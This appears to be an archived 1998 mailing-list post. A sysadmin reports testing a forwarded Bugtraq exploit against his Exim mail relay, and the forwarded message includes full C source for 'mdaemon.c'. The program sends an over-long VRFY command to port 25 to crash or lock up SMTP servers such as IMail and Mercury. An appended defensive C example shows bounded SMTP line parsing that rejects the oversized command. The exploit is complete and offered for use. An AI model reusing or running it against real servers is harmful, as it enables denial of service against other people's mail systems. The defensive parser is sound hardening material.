I tried this out against our Sparc/Ultra1 mail relay, which runs gcc-built
Exim1.82.
It didn't seem to crash it. It did oddly report "too many connections"
for a little while, but I'm reluctant to repeat the test to try and
destroy a live machine!
I had to add
    #include <sys/types.h>
to make it build.
Paul
----
P Mansfield, Senior SysAdmin PSINet, +44-1223-577577x2611/577611 fax:577600
"He who fights and runs away is wasting good running-away time".. A.J. Rimmer
---------- Forwarded message ----------
Date: Wed, 8 Apr 1998 07:10:25 -0400
From: Jon Beaton <steven@???>
To: BUGTRAQ@???
Subject: smtp overflows
There have been more posts about the buffer overflows on smtp daemons,
so I thought this may be useful. After posting about these attacks on
SLMail and Imail, I found that there were a lot more that were still
affected. On the few I've tried on the Mac, like Mercury, it had locked
the server up, much like Appleshare. Anyways, this is just mdaemon.c
with just a few tiny changes, just thought it may be useful. Btw, I just
wanted to note that this will also crash IMail, even though the author
has said it wasn't affected.
Jon
/*
mdaemon.c with a few small changes.
known to lock up the whole server with some daemons on the Mac
Cisc0 @ Undernet
*/
#include <stdio.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
void main(int argc, char *argv[])
{
    struct sockaddr_in sin;
    struct hostent *hp;
    char *buffer;
    int sock, i;

    if (argc != 2) {
        printf("usage: %s <smtp server>\n", argv[0]);
        exit(1);
    }
    hp = gethostbyname(argv[1]);
    if (hp==NULL) {
        printf("Unknown host: %s\n",argv[1]);
        exit(1);
    }
    bzero((char*) &sin, sizeof(sin));
    bcopy(hp->h_addr, (char *) &sin.sin_addr, hp->h_length);
    sin.sin_family = hp->h_addrtype;
    sin.sin_port = htons(25);
    sock = socket(AF_INET, SOCK_STREAM, 0);
    connect(sock,(struct sockaddr *) &sin, sizeof(sin));
    buffer = (char *)malloc(1000);
    sprintf(buffer, "VRFY ");
    for (i = 0; i<896; i++)
        strcat(buffer, "d");
    strcat(buffer, "\r\n");
    write(sock, &buffer[0], strlen(buffer));
    close(sock);
    free(buffer);
}
--
*** Exim information can be found at
http://www.exim.org/ ***
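
Added example, not part of either message above and not code from Exim or any other MTA: the server-side check that makes a 901-byte VRFY line harmless, namely assembling each command into a fixed buffer, never writing past it, and answering an over-long line with a 500 reply while the session stays usable. The struct and function names are hypothetical; the 512-octet limit (CRLF included) is the command line limit from RFC 5321, and the VRFY input is constructed in memory.

```c
#include <stddef.h>
#include <string.h>
#define SMTP_LINE_MAX 512 /* RFC 5321 limit for a command line, CRLF included */
struct smtp_rx {          /* per-connection state (hypothetical names) */
    char   line[SMTP_LINE_MAX];
    size_t len;           /* bytes stored so far */
    int    overflow;      /* set while an over-long line is being discarded */
};

/* Feed one byte. Returns 0 = line incomplete, 1 = line ready in rx->line (CRLF
 * stripped, NUL terminated), 500 = over-long line dropped; reply 500 to it. */
static int smtp_rx_byte(struct smtp_rx *rx, char c)
{
    if (c != '\n') {
        if (rx->len < SMTP_LINE_MAX - 1)  /* at most 511 bytes before LF */
            rx->line[rx->len++] = c;
        else
            rx->overflow = 1;             /* drop the byte, never write past line[] */
        return 0;
    }
    if (rx->len > 0 && rx->line[rx->len - 1] == '\r') rx->len--;
    rx->line[rx->len] = '\0';
    int rc = rx->overflow ? 500 : 1;
    rx->len = 0; rx->overflow = 0;        /* resynchronise on the next line */
    return rc;
}

/* Feed a received chunk; result of the last line completed in it, else 0. */
static int smtp_rx_feed(struct smtp_rx *rx, const char *buf, size_t n)
{
    int last = 0;
    for (size_t i = 0; i < n; i++) {
        int rc = smtp_rx_byte(rx, buf[i]);
        if (rc) last = rc;
    }
    return last;
}

/* Constructed input: "VRFY " + nfill filler bytes + CRLF, fed as two chunks. */
static int demo_vrfy(struct smtp_rx *rx, size_t nfill)
{
    char msg[2048] = "VRFY ";
    if (nfill > sizeof msg - 8) return -1;
    memset(msg + 5, 'd', nfill);
    memcpy(msg + 5 + nfill, "\r\n", 3);
    size_t n = strlen(msg), half = n / 2;
    smtp_rx_feed(rx, msg, half);
    return smtp_rx_feed(rx, msg + half, n - half);
}
```

With 896 filler bytes the assembler returns 500 and the next command on the same connection is parsed normally; a line of exactly 512 octets including CRLF is still accepted.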